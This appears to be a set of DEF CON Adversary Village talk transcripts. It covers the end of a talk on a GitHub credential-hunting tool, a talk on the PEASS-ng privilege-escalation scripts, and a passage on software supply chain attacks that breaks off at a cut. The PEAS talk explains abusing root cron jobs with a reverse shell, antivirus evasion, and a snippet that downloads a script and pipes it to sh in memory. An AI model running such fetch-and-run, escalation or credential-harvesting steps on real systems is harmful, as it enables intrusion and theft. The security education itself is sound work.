data here; we found some usernames and passwords as well. As I told you, all results are all of the results Cred Stroller can come up with. We are also interested in the lucky results, which are parsed and retrieved from all of the results using the regular expressions. I think this one is still populating, so let's wait a few minutes and come back once all of the results are populated. In the meantime, you can see that it has already populated one result which was not shown to us in the first manual search: we searched for redteam.cafe and password, and this specific keyword and password were not shown there. Let's see if this is updated. It is not updated yet; let's wait a few more minutes. All of the results have been populated now. We can see that it has found a lot of passwords, including some which we didn't find last time and some which I didn't intend for it to find in the first place. As long as it works, I am happy. Of course, you can see that there are some false positives like these.
This one tells me that there is some automation script, and I can go and look inside that specific repository. It is still useful; I will not say it is completely useful, but it gives me an idea of what may be inside the repository. We come back to the results, and we can see that it has found some passwords here. This password was definitely not found in the first manual search. Why? Because in this specific file, if I go to it, you can see that there is no mention of redteam.cafe, and if there is no mention of redteam.cafe, the combined manual search for redteam.cafe plus password will definitely not find this file. I would say this is the best scenario for why you should use Cred Stroller: it is able to find passwords which are hidden inside configuration files and may not have the company name inside those files. Coming back to the slides: as you can imagine, this can also be abused for mass credential gathering. I will not dive deep into that; I will leave it up to your imagination. If you provide the right regexes, you can do almost anything you want with this tool. For future improvements, there are some GitHub API restrictions which we should try to overcome; that is why we were using two keys, and we can use many keys, because the more keys you use, the faster the search is. I am definitely thinking of adding cron job functionality, because that would greatly increase the usability of the tool: I could run it in the background and it would keep searching every hour, and any time there is a credential leak I could quickly get a notification. We could add an export to CSV, because that is very important; sometimes we need a CSV to show to management. We can also think of adding more regexes. If the community wants, they can add more regexes and keywords, and we can have multiple keyword and regex sets for people to use in the future. If you have any questions, please let me know using the Discord channel. That is it. Thank you. If you have any questions after this talk, you can contact me on Twitter; you can also find me on my website. That is it, thank you, have a nice day. Bye-bye.
|
This talk covers the basics of credential reconnaissance performed for a red team, mostly the reconnaissance performed on GitHub to search for passwords leaked by developers. It covers the current toolset and the shiny new GitHub Credentials Stroller, which dives into each repository and performs a deep scan.
|
10.5446/54359 (DOI)
|
First of all, thank you very much for having me here today. I'm very excited to be here at DEF CON in the Adversary Village, and I hope you like this presentation, which is called New Generation of PEAS. We are going to discuss a little bit about PEAS and why there is a new generation. My name is Carlos Polop. I work as a senior security engineer at Merle. I have some certifications, I play CTFs, and all that stuff, so if you want to know something else about me, just check my LinkedIn, and you can also contact me via Twitter or even email for the more traditional stuff. In this talk we are going to cover the PEAS suite: what it is, why it is useful, and why there is a new generation. Then I'm going to very briefly introduce HackTricks and how it can be useful in combination with the PEAS suite. Then we are going to see some demos of LinPEAS, MacPEAS, and WinPEAS. At the end, we are going to very briefly see what BotPEAS is, the latest addition from just one or two months ago, and then I want to talk a little bit about the to-do list, to show the community how you can help the PEAS suite if you like it. So, the PEAS suite. The name PEAS comes from Privilege Escalation Awesome Scripts. Basically, this suite is a collection of scripts that will allow you to enumerate the most common hosts, and I'm talking about Windows, Linux and Unix in general, and even macOS, in order to find easy ways to escalate privileges. Before the PEAS suite, there were already a few scripts that performed these actions. I liked them, but I didn't feel very comfortable with them, because there was a lot of data that was mostly useless, and I didn't want to lose my time reading it and figuring out whether I could use it in any way or not, and because they didn't have enough checks, or at least they didn't have the checks I wanted to enumerate. That's the reason I started this suite. In PEAS you are going to find very comprehensive scripts for enumerating hosts, seeing how hardened they are and how you can escalate privileges. You are not going to find endless data lists, so you are going to know where you need to focus in order to find the vulnerabilities you are looking for. They have more checks than any other tool, at least that I have tried, and that is because I add probably one new check per week, which is a very cool way to keep the scripts updated. As I said before, PEAS can be executed on Linux, macOS, mostly any Unix flavor, and also Windows, which is great; I think it is the only privilege escalation enumeration tool that can be executed on this many different operating systems. But I think the thing most people love about PEAS is that the output is colored. This means that you are going to see, for example, the color red where something is suspicious, or the color green where something is well configured. This is very useful to know where you should focus in order to try to find vulnerabilities. The last characteristic is monitorization. We will talk about this later, because actually you cannot use any monitorization at the moment, but my idea with the PEAS new generation scripts is that you will be able to execute PEAS on a host as frequently as you want and compare the different results, in order to see how well you are doing at hardening your systems. This isn't available yet, but I hope it will be soon.
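As a sketch of that monitorization idea, and not a feature PEAS ships today, you could simply keep the output of each run and diff two runs to see which findings appeared or disappeared as you harden the host. The file names below are examples, and colored output would need its ANSI codes stripped before diffing.

```python
#!/usr/bin/env python3
"""Sketch: diffing two saved PEAS runs to track hardening progress over time.
Not part of the PEASS suite; file names are examples."""
import difflib
import pathlib

old_run = pathlib.Path("linpeas_2021-07-01.txt").read_text(errors="ignore")
new_run = pathlib.Path("linpeas_2021-08-01.txt").read_text(errors="ignore")

diff = difflib.unified_diff(
    old_run.splitlines(),
    new_run.splitlines(),
    fromfile="previous run",
    tofile="latest run",
    lineterm="",
)

# Only print findings that appeared or disappeared between the two runs.
for line in diff:
    if line.startswith(("+", "-")) and not line.startswith(("+++", "---")):
        print(line)
```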
Well, the more help the community gives me, the sooner this will be ready. Before going into depth with PEAS, I want to show you what HackTricks is, because it is going to be highly useful when using these tools. So I'm going to open this link, and you can see that HackTricks is basically a book with a lot of cool hacking tricks. For now I want us to focus on the privilege escalation checklists for Linux and Windows, and in a few weeks I hope I will create one specifically for macOS, where you can see checklists of things that you should search for on each computer in order to try to find vulnerabilities and either improve the security or exploit the vulnerabilities, depending on whether you are on a red team or a blue team. HackTricks is also pretty useful because, when you execute these tools, you are probably going to see some links to parts of the book. This is because, if you don't understand the check the script is performing, you can access that URL and you will find the theory behind the check: what is being checked, why it is performed, what it is useful for, and how you can exploit a vulnerability found in that section, if any. You have it for Linux, for macOS in the future (I'm just starting), and for Windows. To give you a very brief example, let's say you find some vulnerability related to access tokens and you don't know what access tokens are in a Windows environment; you can just come here and get a description of what an access token is, how to enumerate them, how they can be abused, and so on. Basically, this is pretty useful for knowing why PEAS performs the checks it does and how you can exploit any vulnerability you find. You also have the URL here; it is free for everyone, you can just access the book and use it, like PEAS. So let's continue. Now we are going to start with the demos: first a Linux demo with LinPEAS, and then a demo with MacPEAS. Here I have a pretty vulnerable and very outdated Debian machine on which we are going to execute LinPEAS, just to see the vulnerabilities it finds. I have already accessed this machine via SSH, so I'm logged in as my user "user" on this very outdated Debian machine, and I have already uploaded LinPEAS, so we are just going to execute it. First of all, take a look at the options, because LinPEAS and WinPEAS have several options that may be useful. For example, in LinPEAS you can find -a, which means perform all checks. This exists because there are some checks that are very slow or very noisy, so they aren't executed by default, but if you are playing a CTF or you don't care about being noisy or about the time, I completely recommend you execute with -a, because more checks are going to be performed. You also have the superfast option, and you have some options that will allow you to perform network recon using just LinPEAS, which is kind of cool, because with LinPEAS alone you will be able to enumerate the machine and also the network, if you don't want to upload any other tools. So let's execute LinPEAS. We are just going to run it without -a, in the normal way. Here we can see that LinPEAS starts with a very, very beautiful banner. Here we can find the version, and we can find the legend.
This explains what the colors mean, which is kind of awesome: here we can see that red-yellow indicates a 90 to 95 percent chance of a privilege escalation vector, red means you should take a look at it, and green basically means well-configured things or common things that you really shouldn't care about, because they are found on other machines as well. We have some basic information, some information about the tools that are available to enumerate the network, and then we start enumerating the system. Here we can find system information; we can see in red that the kernel is pretty old, and the sudo version is also a little old, so probably both are vulnerable. We can see a little more information about the system; in the environment section you may be able to find some passwords. We also enumerate some Linux protections, like whether SELinux is enabled, and whether this is a virtual machine (it actually is). We have some information about the container if this were a container, but we aren't inside a container, so nothing interesting here. Devices, available software: it's good to know if you have a compiler available to compile possible kernel exploits. Then we start taking a look at processes that might be abused to escalate privileges, binary process permissions, and cron jobs. And here we find the first highly probable privilege escalation vector that LinPEAS has found: this user is able to write to a path that is used in a cron job that is then executed by root without indicating the full path. So, for example, if we create a file called override.sh with a reverse shell in this folder, it is going to be executed by root, and we are going to obtain a reverse shell running as root. Here we can see LinPEAS enumerating more information. The network is always important too, to know where you are in a network and which other networks you can access and enumerate; here we have just enumerated the local network, and we are even checking whether we can sniff traffic using tcpdump. Then we enumerate some user information, and here we can see that there are a bunch of ways to escalate privileges by executing different binaries with sudo. More information about the users, then software information. This is pretty interesting, and it's one of the main topics in the new generation scripts: here we are looking for sensitive files, files that may contain sensitive information related to some specific software, for example Tomcat configuration files that may have passwords inside. You can see that we are looking for a bunch of them; we'll talk about this later. So we are going to continue to the last section, which is interesting files. The files that appear here do so because they have some interesting attribute that makes LinPEAS enumerate them. For example, here we can find all the SUID files. Some of them have been vulnerable in the past, so we have some information about which systems these SUID binaries are vulnerable on, and also the SUID binaries that are unknown, where LinPEAS is going to perform a few checks to see if we can abuse these files to execute arbitrary commands and escalate privileges. Same thing for SGID files. Again, if you don't know what these files are, you can follow this link and you will find all the information.
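To show the underlying idea of one of these checks, here is a minimal Python sketch of SUID/SGID enumeration. LinPEAS itself is a bash script and does far more (matching against known-vulnerable binaries, highlighting unknown ones, and so on); this only illustrates the filesystem walk.

```python
#!/usr/bin/env python3
"""Minimal sketch of SUID/SGID binary enumeration, one of the checks LinPEAS
automates. Search roots are a small illustrative subset of the filesystem."""
import os
import stat

SEARCH_ROOTS = ["/usr", "/bin", "/sbin", "/opt"]

for root in SEARCH_ROOTS:
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                mode = os.lstat(path).st_mode
            except OSError:
                continue  # unreadable or vanished file
            if not stat.S_ISREG(mode):
                continue
            if mode & stat.S_ISUID:
                print("SUID:", path)
            elif mode & stat.S_ISGID:
                print("SGID:", path)
```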
Checking misconfigurations, well, we keep checking misconfigurations: we find a few writable files and folders here that we can abuse to escalate privileges, so this is very cool. It checks a lot of files, so basically you are going to see that LinPEAS looks for a lot of information that may give you sensitive data or the power to escalate privileges. Always take a look at everything, because you can find something interesting. So this is LinPEAS. Now we are going to continue with a MacPEAS demo, but there is something important you need to know first: there is no separate MacPEAS script, because MacPEAS actually lives inside LinPEAS. If you execute LinPEAS on a Mac host, MacPEAS is going to be executed. I created the script this way because both flavors share around 90% of the code, so almost every part of the code is shared; I just wrote some Mac-specific parts so they run on a Mac computer instead of the regular Linux checks. As you can see here, you just execute LinPEAS on a macOS system and the MacPEAS version is automatically executed. This is very cool, because you only need to know how one script works in order to run it on Linux, on macOS, and potentially on any flavor of Unix. My current host is a Mac, so I have already executed the LinPEAS version on it. Actually, I haven't executed it from a file; I have executed it from memory: I just downloaded it from GitHub and piped it into sh, so the script never touches the disk (see the sketch below). I ran it beforehand because my host has a lot more files than a virtual machine, so instead of taking just one minute it could take around five to ten minutes, and I didn't want to keep you waiting. Here we can see that the banner is much uglier; I really need to improve that, but it's not at the top of my priority list. Again, we can see some basic information, some system info, and mostly the same information from LinPEAS in MacPEAS. The difference is that, underneath, different binaries are being executed to obtain the same information. It's pretty cool, because you just execute one script, it is intelligent enough to distinguish between Mac and Linux, and the correct version runs. As I have said, you are going to find mostly the same information as before, so we can skip this output; you can test it on your own. There are also other, more stealthy ways to execute LinPEAS. A bunch of them are mentioned in the README, including ways to bypass antivirus, so check that out, because it's going to be very cool for you to learn how you can execute LinPEAS using just netcat and curl, or even without them, using bash pipes. So, that's all for LinPEAS. Okay, let's continue with WinPEAS, which is obviously the Windows version of the script. Here I have a Windows virtual machine where we are going to execute WinPEAS. WinPEAS uses a completely different codebase than LinPEAS; actually, there are two different projects for WinPEAS: the .bat version and the .exe version. The .bat version is less maintained than the .exe version and is mostly meant for old Windows machines, so the most maintained version of WinPEAS is the .exe one, and it's the one I recommend you execute if you can.
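For the "execute it from memory" step mentioned above, here is a hedged Python equivalent of the curl-pipe-to-sh approach: the script bytes are fetched and fed to sh over stdin, so nothing is written to disk. The release URL below is the one commonly documented in the PEASS-ng README; check the repository for the current one, and of course only run this on systems you are authorized to test.

```python
#!/usr/bin/env python3
"""Sketch of fileless execution of linpeas.sh: download the script and pipe it to
`sh` via stdin so it never touches disk. The URL is illustrative; verify it against
the PEASS-ng README, and only use this on machines you are allowed to test."""
import subprocess
import urllib.request

URL = "https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh"

script = urllib.request.urlopen(URL).read()   # script bytes stay in memory
subprocess.run(["sh"], input=script)          # sh reads the script from stdin
```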
Obviously, there are some requirements, like the .NET version, but on modern Windows you are mostly going to be able to execute it, so I definitely recommend this version. Here we also have a quick start, and a few ways to execute WinPEAS from memory, or to do some stealthy things so that antivirus doesn't detect that we are executing the binary. I recommend you take a look, because it's pretty interesting. WinPEAS also has some interesting parameters. For example, WinPEAS allows you to execute LinPEAS, which is very cool: if you find the Windows Subsystem for Linux on a Windows host, you can execute LinPEAS, because it's a bash script; if you just give WinPEAS the URL where it can find LinPEAS, it is going to download and execute it, from memory I think. You don't even need to host your own copy of LinPEAS; you can just use the LinPEAS URL inside GitHub. You also have more help and basic information. Where are my colors? When you execute WinPEAS on a fresh Windows host without doing anything, you are not going to see any colors. You need to run this registry command first, to tell the console to interpret the colors that are going to be printed (a sketch of the same change is shown below). Just run it, you don't need to be an administrator or anything, and the colors will magically appear; you do need to start a new PowerShell session. Okay, so I have already run WinPEAS on this host. We can see another very beautiful banner, some information about the creators, and we start seeing some system information. Watson is integrated inside WinPEAS, which is pretty cool because it just runs along with WinPEAS. Here we can see it enumerating the hotfixes that have been applied to this virtual machine, information about environment variables, and information about things like WEF, LAPS and WDigest. Again, if you don't know what WDigest is, for example, you can just open this URL inside HackTricks and you will learn what it is and why it's important. The same goes for LSA Protection and Credential Guard. The main difference between WinPEAS and LinPEAS, apart from the obvious one, is that you are not going to find the red/yellow highlighting in WinPEAS that you find in LinPEAS. That's because in Windows it's more complicated to be so sure that something is going to give you a privilege escalation path, so I haven't implemented that yet, but I may do it in the future. As you can see, WinPEAS enumerates a lot of things, including interesting events. Now we have some user information; in red, you can find interesting things for attackers. Here you can find the administrator user and the home folders. Something interesting about WinPEAS is that it checks every path that appears. For example, if this path were writable by our current user, it would appear in red and tell you: hey, you can overwrite this binary, maybe you can escalate privileges because it is being executed. As you can see here, you obviously cannot escalate privileges by overwriting WinPEAS itself, because it's a binary run by our own user; but if it were being run by another user who is an administrator and you could write to the binary, you might be able to escalate privileges. The same applies to the services information.
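For the "where are my colors" step, the registry value being referred to is, as far as I know, VirtualTerminalLevel under HKCU\Console, the same value the documented REG ADD one-liner sets. A small Python sketch of that change, purely as an illustration:

```python
"""Windows-only sketch: enable ANSI color interpretation in the console so the
WinPEAS output is colorized. This sets the same HKCU value the documented
REG ADD one-liner sets; no admin rights needed, open a new shell afterwards."""
import winreg

key = winreg.CreateKeyEx(winreg.HKEY_CURRENT_USER, r"Console", 0, winreg.KEY_SET_VALUE)
winreg.SetValueEx(key, "VirtualTerminalLevel", 0, winreg.REG_DWORD, 1)
winreg.CloseKey(key)
print("VirtualTerminalLevel set to 1 under HKCU\\Console - start a new shell.")
```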
Actually, here you can see an example of what I have been talking about: the binary of this service is writable by everyone, so here you have a privilege escalation path. WinPEAS also checks for unquoted service paths containing spaces, so you may be able to abuse that misconfiguration to escalate privileges as well. Then more information about applications and autoruns; again, you may find locations you can write to where your binary will be executed with higher privileges, which is pretty awesome. I want to show you a few more things. Network information: again, it's very important to know where you are inside an internal network, if you're inside one, and which other networks you can access that you weren't able to access before. It's also important to check the ports, including the TCP and UDP ports that are listening only on localhost, because those services may be vulnerable and you may be able to escalate privileges using them. We found the NTLM hash of our current user. We found the unattended install file, which may contain credentials for the administrator user. And this is pretty awesome: here in the file analysis section, we are also looking for a lot of files that may be storing sensitive information. Before the PEASS new generation, every time I wanted to search for a file that might contain sensitive information, I needed to add a specific check to LinPEAS and then another specific check to WinPEAS. That was pretty awful, because it was hard to keep in sync and it took a while. With the new-generation scripts, we have a build list: inside the build list folder there is a sensitive-files YAML where you can find all the files that can potentially store sensitive information. For example, the FileZilla entry tells the scripts to search for a folder named FileZilla, and inside that folder to search for the file called sitemanager.xml; if it is found, print in red all the lines that match certain regexes (a generic sketch of this build-list idea is shown below). This is awesome because LinPEAS and WinPEAS are automatically generated from this YAML, so both of them are going to search for all these files and, if they find them while executing, they print them for you. Now, to add a new check, if I discover a new file that may contain sensitive information, I can just add it to this YAML, and the new LinPEAS and WinPEAS will automatically be built to search for the new sensitive file. This makes the project very easy to maintain, and it's also very easy for the community to help me add new files that may store sensitive information. Actually, you have a few well-explained examples here, so if you want to contribute to the script because you know about a file that may contain credentials and isn't included yet, just take a look at the examples, add it to the YAML, and create a pull request to master; the new versions will be built automatically, so it's just awesome. As I said before, WinPEAS has another flavor, the .bat one, which is meant for old machines. The syntax is a little more complicated, because batch is not very flexible.
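To make the build-list idea concrete, here is a generic Python sketch of a YAML-driven sensitive-file search. The field names and entries below are invented for the example and do not match the exact schema of PEASS-ng's sensitive-files YAML; it requires PyYAML.

```python
#!/usr/bin/env python3
"""Illustration of the build-list idea described above: a small YAML document lists
files that may hold credentials plus regexes to highlight inside them, and one
generic searcher consumes it. The schema here is made up for the example and is NOT
the exact PEASS-ng schema. Requires PyYAML (pip install pyyaml)."""
import os
import re
import yaml

EXAMPLE_RULES = """
- name: FileZilla saved sessions
  filename: sitemanager.xml
  regexes: ["<Host>.*</Host>", "<User>.*</User>", "<Pass.*>.*</Pass>"]
- name: AWS CLI credentials
  filename: credentials
  regexes: ["aws_access_key_id", "aws_secret_access_key"]
"""

def report(path, rule):
    print(f"[!] {rule['name']}: {path}")
    try:
        with open(path, errors="ignore") as fh:
            for line in fh:
                if any(re.search(rx, line) for rx in rule["regexes"]):
                    print("    ", line.rstrip())
    except OSError:
        pass

def search(root, rules):
    for dirpath, _dirs, files in os.walk(root, onerror=lambda e: None):
        for rule in rules:
            if rule["filename"] in files:
                report(os.path.join(dirpath, rule["filename"]), rule)

if __name__ == "__main__":
    search(os.path.expanduser("~"), yaml.safe_load(EXAMPLE_RULES))
```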
Anyway, if you need to use it at some point, you can find it here, and also take a look at this explanation of how to read the permissions, because you will need it in order to find the paths to escalate privileges: you are not going to get colors here, because batch is not very flexible. We are getting to the end of this presentation, so let's continue with BotPEAS. I created this one or two months ago, I think. It's a very, very simple script: it monitors new CVEs, and the ones related to privilege escalation are posted to this Telegram group. In the group we also discuss HackTricks, PEASS, and the latest news in cybersecurity. It's free for everyone, so feel free to join. You can also find BotPEAS on GitHub, here. This bot actually lets you create your own bot and monitor the CVEs you are interested in: you can modify this YAML, set your own keywords, and then add your Slack webhook or your Telegram token, and the bot will send you all the new CVEs that contain the keywords you have specified (a minimal sketch of the idea follows). In this case, we are just looking for things related to privilege escalation or Docker container escapes. So, yeah, feel free to join the group if you like. Finally, about the to-do list. In this new generation we have the capability of creating JSON from the raw output, and you can find the script to generate these JSONs in the parser folder: you basically execute the PEASS parser, give it the path to the output of one PEASS script, and it generates the JSON. I'm looking for someone who, from that JSON, can generate a beautiful PDF or HTML report; that would be awesome. I also want to develop WebPEAS, which is going to be a centralized agent that will allow you to automatically execute LinPEAS or WinPEAS, compare the results, and even add new features. So I'm really looking for someone with experience in front end and/or back end; if you want to help me develop WebPEAS to enable this kind of constant monitoring, just contact me. And finally, obviously, WinPEAS and LinPEAS are very big scripts, but they can be bigger, so if you know about new checks, or if you want to help update the lists they are using, contact me, because this is a huge project and any help you can bring is welcome. I hope you have enjoyed this talk. Thank you very much, I hope you are enjoying DEF CON, and I will be in the Discord channel if you have any questions. Thank you for your time again.
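For reference, a minimal sketch of the BotPEAS idea described above: filter newly published CVEs by keywords and push matches to a webhook. This is not BotPEAS's actual code; fetch_recent_cves() is a stub to be wired to whatever CVE feed you prefer, the webhook URL is a placeholder, and the {"text": ...} body is the standard Slack incoming-webhook payload.

```python
#!/usr/bin/env python3
"""Sketch of a CVE keyword watcher in the spirit of BotPEAS (not its real code).
fetch_recent_cves() is a stub returning sample data; plug in a real CVE feed.
WEBHOOK_URL is a placeholder; the JSON body matches Slack's incoming-webhook format."""
import json
import urllib.request

KEYWORDS = ["privilege escalation", "container escape"]       # as in the talk's example
WEBHOOK_URL = "https://hooks.slack.com/services/XXX/YYY/ZZZ"   # placeholder

def fetch_recent_cves():
    """Stub: return recently published CVEs as (cve_id, description) tuples."""
    return [
        ("CVE-0000-0001", "Example local privilege escalation in ExampleOS"),
        ("CVE-0000-0002", "Example XSS in ExampleApp"),
    ]

def interesting(description):
    d = description.lower()
    return any(k in d for k in KEYWORDS)

def notify(cve_id, description):
    body = json.dumps({"text": f"{cve_id}: {description}"}).encode()
    req = urllib.request.Request(WEBHOOK_URL, data=body,
                                 headers={"Content-Type": "application/json"})
    urllib.request.urlopen(req)

if __name__ == "__main__":
    for cve_id, description in fetch_recent_cves():
        if interesting(description):
            print("[match]", cve_id, description)
            # notify(cve_id, description)  # uncomment once WEBHOOK_URL is real
```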
|
Local privilege escalation techniques go far beyond checking the Windows/kernel version, looking for unquoted service paths or checking SUID binaries. Moreover, a local privilege escalation can make a huge difference when trying to compromise a domain. Several tools have been created to find possible privilege escalation paths, but most of the tools for red teaming and pentesting only check a few possible vectors, so pentesters need to use several tools and do some manual recon to check for everything. PEASS is a compilation of a bash script for Linux/MacOS/*nix and a .NET project plus a batch script for Windows that I created some time ago, which aims to check and highlight every possible privesc path so professionals don't need to execute several different tools for this purpose and can very easily find vulnerabilities. During this talk I would like to present PEASS-ng. The architecture of these scripts has evolved and improved so much that I would like to present how they work at the moment and how the difficulty of collaborating with the project has been reduced significantly. Moreover, I would also like to present the 2 new PEAS that haven't been presented anywhere yet: BotPEAS and WebPEAS (the latter will be released the day of the talk). During the talk I will also present my local privilege escalation resources (https://book.hacktricks.xyz/linux-unix/privilege-escalation , https://book.hacktricks.xyz/windows/windows-local-privilege-escalation) so attendees will be able to continue learning about the topic after the talk.
|
10.5446/54360 (DOI)
|
Hello, welcome to my talk. I'm Cheryl Biswas, I also go by encrypted, and I really appreciate you taking the time to discover software supply chain attacks and the Chinese APTs who have increasingly been behind them: signed, sealed, and delivered. So, who am I? I work as a threat intel analyst with a major bank here in Toronto, Canada. I am a founding member of The Diana Initiative; we just had our conference, which was online. Much thanks and appreciation to everybody who was able to be part of it; we love supporting inclusion and diversity and just drawing a bigger circle around who we bring into this amazing field. I'm also part of the C3X college student cyber simulation here in Toronto. It's an annual event, because it's great to give college students the opportunity to learn, in a real-life environment, what it feels like to respond to an incident and how to communicate with management, and just to be able to pay it forward, because we all started somewhere. Okay, that's enough exciting things about me. I'm a cat mom, but you don't get to see my cats; they are in the other room. All right. In this talk, I want to explain what software supply chain attacks are and the growing threat they pose. We're going to take a look at code dependency, how that's a factor, and how it's compounded by mistakes and misconfigurations. We're going to look at some of the attacks and the state-sponsored actors involved, which will highlight the prevalence of Chinese threat actors, who continue to up their game and the number of victims. And then we'll wrap up with what we could do better and how we need to shift. Okay. I thought that this would be a great starting point: what a year it's been. Even before we got out of the gate, the tone was set. SolarWinds was truly unprecedented, and it's the kind of event that we talk about for decades; we build on it and we learn from it. But the thing is, software supply chain attacks aren't something new. They've been around for many years, and we've been watching that check-engine light for a long time without really addressing the issues. So I'm here to tell you there is a lot more going on than we realize. A supply chain attack is an abuse of trust. It's a compromise right at the source, which can create access points into the networks of customers in the thousands, as was demonstrated by the attack against SolarWinds Orion. And as we learned, nobody is untouchable; everyone is a potential target. According to MITRE ATT&CK, a software supply chain attack happens when hackers manipulate the code in third-party software components in order to compromise the downstream applications that use them. Attackers leverage compromised software to steal data, corrupt targeted systems, or gain access to other parts of a victim's network through lateral movement. Any other upstream part of an organization's supply chain can then be targeted. That can include application developers or publishers of off-the-shelf software like SolarWinds, but also think of API providers, and there are more APIs by the day, and the open source community in general. Quote: the attackers tamper with the development process of the software to inject a malicious component, such as a remote access tool, that will allow them to establish a foothold into the targeted organization or individual. Pretty powerful, very effective. Now, this is a timeline of events going from the end of 2020 into this year.
And as you can see, it got busy. You might even recognize some items on there, and we'll talk a bit about most of these as we go through. Attackers will manipulate software dependencies and development tools in order to compromise data or systems before they reach the recipient, and as we've seen, they go after the source code. In the case of SolarWinds, Microsoft said that attackers gained access to some of the source code for Exchange, Azure and Intune. I don't have to tell you, especially not after this March, just how many Exchange boxes are in use out there, or how many organizations have Azure up and running, or are in the process of getting it up and running with the mass migration to cloud environments. Having the source code lets the attacker look for undiscovered vulnerabilities in order to exploit them first. And they like to go after certificates. That's another thing: software certificates are involved in so many of these attacks, pretty much all of them. Stolen code-signing certificates allow the attackers to evade detection and deliver malware payloads as though they come from a legitimate source, because of course, with a certificate, why wouldn't they? Signed, sealed, delivered. This is what the Chinese APT Barium did with the ASUS Live Update when they infected ASUS users en masse. And certificate abuse is an ongoing component in all kinds of attacks; for example, two years ago in an npm attack, developer accounts were targeted and build environments were compromised. So let's talk about the who and the why. This is definitely the purview of state-sponsored threat actors, who have in many cases been identified as a group of Chinese cyber espionage groups known as APT10, APT17 and APT41, under various other nicknames, as well as some major Russian threat actors. China has actively targeted tech companies in Taiwan with supply chain attacks because they see them as major competition. And this is where what I do, threat intelligence, plays a key role, because we're watching the geopolitics play out and we're reaching back for historical context on patterns of behavior, because history repeats itself and actions have consequences. Ian Pratt, who is the global head of security for personal systems at HP, had this to say: whether they are a direct target or a stepping stone to gain access to bigger targets, as we've seen with the upstream supply chain attack against SolarWinds, organizations of all sizes need to be cognizant of this risk. Both cybercriminal and state-sponsored groups target the technology industry because these companies are relied on by many organizations and individuals, and that can have a wide-ranging impact. Attacks on tech companies can enable third-party compromise of enterprise customers via software supply chain attacks. And that's the beauty of a supply chain attack: you don't have to go directly after your target, you come at them sideways. Nick Weaver, a security researcher at UC Berkeley's International Computer Science Institute, shares this: supply chain attacks are scary because they're really hard to deal with, and because they make it clear that you are trusting a whole ecology. You are trusting every vendor whose code is on your machine, and you are trusting every vendor's vendor.
We're grappling with a growing complexity in tech, and it's not just what corporations deploy in their own environments but how they incorporate third-party tech. As Window Snyder says, the product assumes all the security risks of all the components that it incorporates. Need I say more? As I mentioned earlier, we are increasingly code dependent; sorry, bad pun. The fact is that applications increasingly depend on external software to work: proprietary code, open source components, third-party APIs. Modern apps are simply too big for one developer to try to build on their own, so software reuse has become the norm. Popular open source projects are used as dependencies, and these become attractive targets for an attacker, who can add malicious code to them and thereby compromise the users of those dependencies. Per GitHub security researcher Maya Kaczorowski, 85 to 97% of enterprise software code bases come from open source components. Yeah, that is a big number. And the average project has 203 dependencies. That's a lot of trust involved. Now, given how sophisticated these attacks can get, any project that doesn't incorporate basic protections like code signing puts itself at considerable risk. Again, we're using other people's technology; this is about trust issues. So this is a timeline of software package repositories that have been involved in supply chain attacks. It's really easy to just take code from various projects online and incorporate it into other software. But here's the risk: some of those open source projects are widely used but not well maintained, and some have even been abandoned. Code reuse can help simplify and speed up application development, but at the cost of being vulnerable to compromised off-the-shelf components. For an attacker, compromising a software supply chain can happen through manipulation of the application source code, manipulation of the update and distribution methods, or by replacing compiled releases with modified versions. And targets can range from a very specific and limited group to a very wide one. And that brings us here: the continuous integration and continuous delivery pipeline, CI/CD. It's considered a best practice for DevOps because it helps them deliver code changes frequently and reliably. It's a good thing. CI is a coding philosophy, a set of practices that drive development teams to implement small changes and check code into version control repositories frequently. Again, this is a great practice; it's a consistent, automated way to build, package and test applications. With one caveat: we're using other people's technology, and mistakes will be made. Yes. In the McAfee blog from last July, Sekhar Sarukkai (and I hope I didn't mangle that) wrote about a source code leak, what we should have learned from it, and how we need to protect our IP. There was a SonarQube misconfiguration, and it led to a massive leak of source code which affected 50 major companies. SonarQube is an open source tool used for static code analysis and to check for bugs before deployment. Now, based on the attacks, developers and insecure development pipelines are ideal targets, either for state-backed APTs or highly resourced criminal groups. So let's discover what those adversarial inclinations look like.
This is from a report called Broken Trust, released by the Atlantic Council earlier this year, following SolarWinds; there was a lot to be processed. There have been 36 cases of intruders successfully targeting software updates out of 138 recorded supply chain attacks and vulnerability disclosures. Of these 36, 15 had similar access to build or update infrastructure. Think about that: that is a lot of control, when you can tamper with and modify existing infrastructure. And half of those 15 could be attributed to nation states. So, on December the 14th, 2020, the news hit. SolarWinds Orion is trusted network management and monitoring software. It's used by governments, Fortune 500s, security companies like FireEye, major tech companies like Microsoft, and nobody knew anything was wrong. The distinctive thing here is the degree of stealth, the ability of the adversary to conceal their actions, and the length of time it took for this to be discovered. This was an operation that took time and precision to do the necessary reconnaissance, the sophistication to tailor all the pieces, and then the patience to just let it play out and avoid detection. They targeted and compromised the software build environment and code-signing infrastructure for Orion. Code, there's that word: code signing. They modified the source code to add a backdoor, and they signed it. They leveraged the existing software release management system, and they used stolen certificates to move laterally through chains of trust. Signed, sealed, delivered. This attack is significant, and I'll tell you a bit about it because it's something we all need to learn from; remember that things continue to evolve, and that just presents opportunity to the attacker. Security researcher Alex Birsan shone a bright light on a scary possibility. He took a hypothesis about a supply chain substitution attack, where a software installer script is tricked into pulling malicious code files from a public repository instead of getting the intended files with the same name from an internal repository. He then targeted Apple, Microsoft, Tesla, and about 32 other companies and executed unauthorized code inside their networks to prove that this would work. However, somebody's watching, somebody's always watching. And in this case, that somebody thought it would be a good idea to do the same without, let's say, that permission. They targeted some other companies in March of this year: again Microsoft, but also Amazon, Slack, Lyft, and Zillow, to name a few. This premise prompted a study by researchers at Red Hunt Labs. What did they find? Well, 93 repositories out of the top thousand GitHub organizations are using a package that doesn't exist on a public package index; that name can be claimed by an attacker to cause a supply chain attack. 169 repositories were found to be installing dependencies from a host that isn't reachable over the Internet, and 126 repositories were installing packages owned by a GitHub or GitLab user that doesn't exist. Of the top thousand organizations that were scanned, 212 had at least one dependency confusion-related misconfiguration in their code base. This is significant because, according to the researchers, much of the open source ecosystem depends on these giants. We know that these repositories have a lot of users, so it stands to reason that if any of their projects were affected, there is a significant likelihood that millions of users could be at risk.
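The dependency confusion findings above boil down to one question: are the private package names your builds reference already claimed on the public index? Here is a hedged Python sketch of that check against PyPI's JSON endpoint (a 404 means the name is unclaimed); the internal-packages.txt file is hypothetical, one package name per line.

```python
#!/usr/bin/env python3
"""Basic dependency-confusion check for Python projects: for each internal package
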